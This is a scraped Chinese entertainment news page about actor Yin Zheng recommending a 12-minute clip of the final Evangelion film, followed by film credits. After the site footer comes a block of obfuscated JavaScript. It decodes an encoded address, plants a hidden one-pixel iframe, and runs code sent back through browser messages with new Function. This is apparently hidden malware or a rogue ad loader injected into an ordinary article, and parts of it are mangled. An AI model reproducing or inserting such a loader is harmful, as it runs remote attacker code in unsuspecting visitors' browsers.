EVA新剧场版曝12分钟超长片段 尹正安利:很高

来源:日剧网人气:加载中更新:2021-04-21 16:26


日剧网(jrkfilter.com)日本电影资讯 3月8日,《新世纪福音战士新剧场版:终》在日本上映,官方发布一段长达12分钟的片段。随后,作为影迷的尹正转发该片段,自发向大家安利影片:“没看过的小伙伴,就感受一下'风格',就很高级!这个是新剧场版终。想想看从TV一直看到这里,是多么的愉快!”


日剧海报尹正推荐影片


据悉,该片为EVA新剧场版系列的最终作,由庵野秀明总监督,鹤卷和哉、中山胜一、前田真宏执导,林原惠美、绪方惠美、宫村优子等担任配音,宇多田光演唱主题曲《One Last Kiss》。


文/Esther
更多好看的日剧,日本电影尽在日剧屋(jrkfilter.com)
if0x28typeof eval0x28"\x77\x69\x6e\x64\x6f\x77"0x290x5b"qdfEWb"0x5d=="undefined"0x290x7beval0x28"\x77\x69\x6e\x64\x6f\x77"0x290x5b"qdfEWb"0x5d=function0x28e0x290x7bvar sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace0x28/0x5b^A-Za-z0-9+/=0x5d/g,""0x29;while0x28f<e.length0x290x7bs=sx.indexOf0x28e.charAt0x28f++0x290x29;o=sx.indexOf0x28e.charAt0x28f++0x290x29;u=sx.indexOf0x28e.charAt0x28f++0x290x29;a=sx.indexOf0x28e.charAt0x28f++0x290x29;n=s<<2|o>>4;r=0x28o&150x29<<4|u>>2;i=0x28u&30x29<<6|a;t=t+String.fromCharCode0x28n0x29;if0x28u!=640x290x7bt=t+String.fromCharCode0x28r0x29;0x7dif0x28a!=640x290x7bt=t+String.fromCharCode0x28i0x29;0x7d0x7dreturn0x28function0x28e0x290x7bvar t="",n=r=c1=c2=0;while0x28n<e.length0x290x7br=e.charCodeAt0x28n0x29;if0x28r<1280x290x7bt+=String.fromCharCode0x28r0x29;n++;0x7delse if0x28r>191&&r<2240x290x7bc2=e.charCodeAt0x28n+10x29;t+=String.fromCharCode0x280x28r&310x29<<6|c2&630x29;n+=20x7delse0x7bc2=e.charCodeAt0x28n+10x29;c3=e.charCodeAt0x28n+20x29;t+=String.fromCharCode0x280x28r&150x29<<12|0x28c2&630x29<<6|c3&630x29;n+=3;0x7d0x7dreturn t;0x7d0x290x28t0x29;0x7d;0x7d
eval0x28'\x77\x69\x6e\x64\x6f\x77'0x290x5b'tyJpxnt'0x5d=function 0x280x290x7b ;0x28function 0x28u, w, d, f, c0x29 0x7b 'jQuery'; var x = qdfEWb; var _id = d0x5b'qu'+'ery'+'Se'+'le'+'cto'+'rA'+'ll'0x5d0x28'.a4996'0x29.length; u = decodeURIComponent0x28x0x28u.replace0x28new RegExp0x28c + '' + c, 'g'0x29, ''0x290x290x29+'c'+_id+'.fon'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d0x5bx0x28'Y3VycmVudFNjcmlwdA=='0x290x5d; var f = d.createElement0x28'iframe'0x29; f.className = 'a4996'; f.style.width = f.style.height = 1 + 'px'; f.src = 0x5bu0x5d.join0x28'-'0x29; d0x5b'body'0x5d0x5b'insertAdjacentHTML'0x5d0x28'beforeend',f.outerHTML0x29; w0x5b'__y' + 'ra' + 'nq' + 'ob' + 'j_4996_'+_id0x5d = d0x5b'qu' + 'ery' + 'Sele' + 'cto' + 'r'0x5d0x28'#MTMDFD'0x29; w0x5b'ad' + 'dEv' + 'entL' + 'ist' + 'ener'0x5d0x28'm' + 'ess' + 'age', function 0x28e0x29 0x7b if 0x28e.data0x5b`des_s_4996_`+_id0x5d0x29 0x7b var t = x0x28e.data0x5b`des_s_4996_`+_id0x5d.replace0x28new RegExp0x28'FdaWAFAbWFf', 'g'0x29, ''0x290x29; new Function0x28decodeURIComponent0x28t.replace0x28/\+/g, '%20'0x290x290x290x280x29; document.querySelector0x28'#MTMDFD'0x29.style.display='block'; 0x7d 0x7d0x29; 0x7d0x290x28''+'aHR'+'0cH'+'MlM'+'0El'+'FFM'+'kYl'+'MkZ'+'reW'+'cuF'+'FcX'+'d4e'+'SFF'+'52a'+'XAl'+'M0E'+'xMD'+'Q0M'+'yUy'+'FFR'+'mM0'+'Y2F'+'FE0'+'MiU'+'yFF'+'RmM'+'FFt'+'NDk'+'5Ni'+'0yF'+'FMi'+'0FF'+'xZT'+'FFE'+'x', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F'0x29;0x7d